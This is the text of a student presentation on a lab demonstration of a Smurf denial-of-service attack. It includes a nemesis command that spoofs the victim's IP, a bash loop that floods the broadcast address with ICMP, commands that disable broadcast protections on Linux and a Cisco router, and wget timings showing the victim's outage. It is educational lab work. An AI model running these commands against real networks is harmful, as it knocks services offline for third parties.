Smurf AttackFarhan Sajjad

OutlineSmurf Attack

What is a Smurf Attack?How is it Engineered?

Project 1Test EnvironmentConducting the AttackResults and Observations

ReferencesQuestions?

What is a Smurf Attack?Denial of Service Attack using spoofed

broadcast ping messages.

How is it Engineered?Essentially, by “spoofing” a broadcasted ICMP

Echo request with the victim’s IP address as the sender

The ICMP Header

Sample Spoofroot@jotilMove# nemesis icmp -v -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 08:00:27:29:4C:F0

 ICMP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)  [MAC] 08:00:27:29:4C:F0 > FF:FF:FF:FF:FF:FF [Ethernet type] IP (0x0800)  [IP] 192.168.0.5 > 192.168.0.255 [IP ID] 3121 [IP Proto] ICMP (1) [IP TTL] 255 [IP TOS] 0x00 [IP Frag offset] 0x0000 [IP Frag flags] [ICMP Type] Echo Request [ICMP Code] Echo Request [ICMP ID] 57730 [ICMP Seq number] 8233 Wrote 42 byte ICMP packet through linktype DLT_EN10MB. ICMP Packet Injected

The Test Environment

The Test Environment (continued)All the Linux machines had Wireshark installed on

themThe attacker had Nemesis installed on it, to generate

spoofed IP packetsThe victim had HTTP server on it, to check its

availabilityHad to turn on No-IP Directed Broadcast

Linux OS: root@jotilMove# echo "0" | cat > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

Cisco IOS: RouterC(config)#int f0/0RouterC(config-if)#ip directed-broadcast

Conducting the AttackCreated a small payload file of size 1472

bytesRan a small script at the attacking machine,

which looped to send spoofed ICMP packets#!/bin/bashi=10000while test $i != 0do

nemesis icmp -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 00:06:29:DF:2A:DA -P payload_fileecho "$i"i=`expr $i - 1`

done

Results

The Attacker’s Screenshot

The Victim’s Screenshot During Attack

The Victim’s Screenshot After Attack

The Observer’s Screenshot

root@hpgcpc06:/home/farhan# time wget 192.168.0.5--2009-11-13 20:49:45-- http://192.168.0.5/Connecting to 192.168.0.5:80... connected.HTTP request sent, awaiting response... 200 OKLength: 177 [text/html]Saving to: `index.html'

100%[======================================>] 177 --.-K/s in 0s

2009-11-13 20:49:45 (15.1 MB/s) - `index.html' saved [177/177]

real 0m0.008suser 0m0.004ssys 0m0.000sroot@hpgcpc06:/home/farhan# time wget 192.168.0.5--2009-11-13 20:50:03-- http://192.168.0.5/Connecting to 192.168.0.5:80... failed: Connection timed out.Retrying....--2009-11-13 20:59:36-- (try: 4) http://192.168.0.5/Connecting to 192.168.0.5:80... connected.HTTP request sent, awaiting response... 200 OKLength: 177 [text/html]Saving to: `index.html'

100%[======================================>] 177 --.-K/s in 0s

2009-11-13 20:59:36 (18.1 MB/s) - `index.html' saved [177/177]

real 9m33.041suser 0m0.008ssys 0m0.000s

ObservationsNumber of participating nodes crucial to the

effectiveness of the attackHardly effected the CPU or Memory utilization

of the Victim, however its network resources were overwhelmed and its services were unreachable

Networked devices after 1998 has turned off No-IP directed broadcasts, so it is difficult to conduct such attacks, however Smurf Amplifiers exists!

References[1] Smurf attack, from Wikipedia: http://en.wikipedia.org/wiki/Smurf_attack[2] smurf.c, [Online document] Available: http://personal.telefonica.terra.es/web/alexb/e/smurf.c[3] The Internet Control Message Protocol, from Wikipedia:

http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol[4] Ping, from Wikipedia: http://en.wikipedia.org/wiki/Ping[5] The ICMP Header. [Online document] Available: http://blog.csdn.net/xuhx/archive/2008/04/16/2297266.aspx[6] How a Broadcast Address Works. [Online document] Available:

http://learn-networking.com/network-design/how-a-broadcast-address-works[7] Denial-of-service attack, from Wikipedia: http://en.wikipedia.org/wiki/Denial-of-service_attack[8] Nemesis Packet Injection Tool Suite. [Online document] Available: http://nemesis.sourceforge.net/[9] Manpage of NEMESIS-ICMP. [Online document] Available:

http://nemesis.sourceforge.net/manpages/nemesis-icmp.1.html[10] Wireshark. [Online document] Available: http://www.wireshark.org/[11] Securing Cisco Routers with No IP Directed-Broadcast. [Online document] Available:

http://learn-networking.com/network-security/securing-cisco-routers-with-no-ip-directed-broadcast[12] Craig A. Hugen, The latest in denial of service attacks: "Smurfing". Description and information to minimize

effects. [Online document] Available: http://www.pentics.net/denial-of-service/white-papers/smurf.cgi[13] CERT® Advisory CA-1998-01 Smurf IP Denial-of-Service Attacks. [Online document] Available:

http://www.cert.org/advisories/CA-1998-01.html[14] Smurf Attack. [Online document] Available:

http://www.softpanorama.org/Net/Internet_layer/ICMP/smurf_attack.shtml[15] Smurf Amplifier Registry [Online document] Available: http://www.powertech.no/smurf/[16] Brian Hatch, Firewalling /proc entries [Online document] Available:

http://www.hackinglinuxexposed.com/articles/20021015.html[17] Todd Lammle, CCNA: Cisco Certified Network Associate Study Guide. ISBN: 978-0470110089. Publisher:

Sybex; 6 edition (August 29, 2007).

Questions?

Thank You!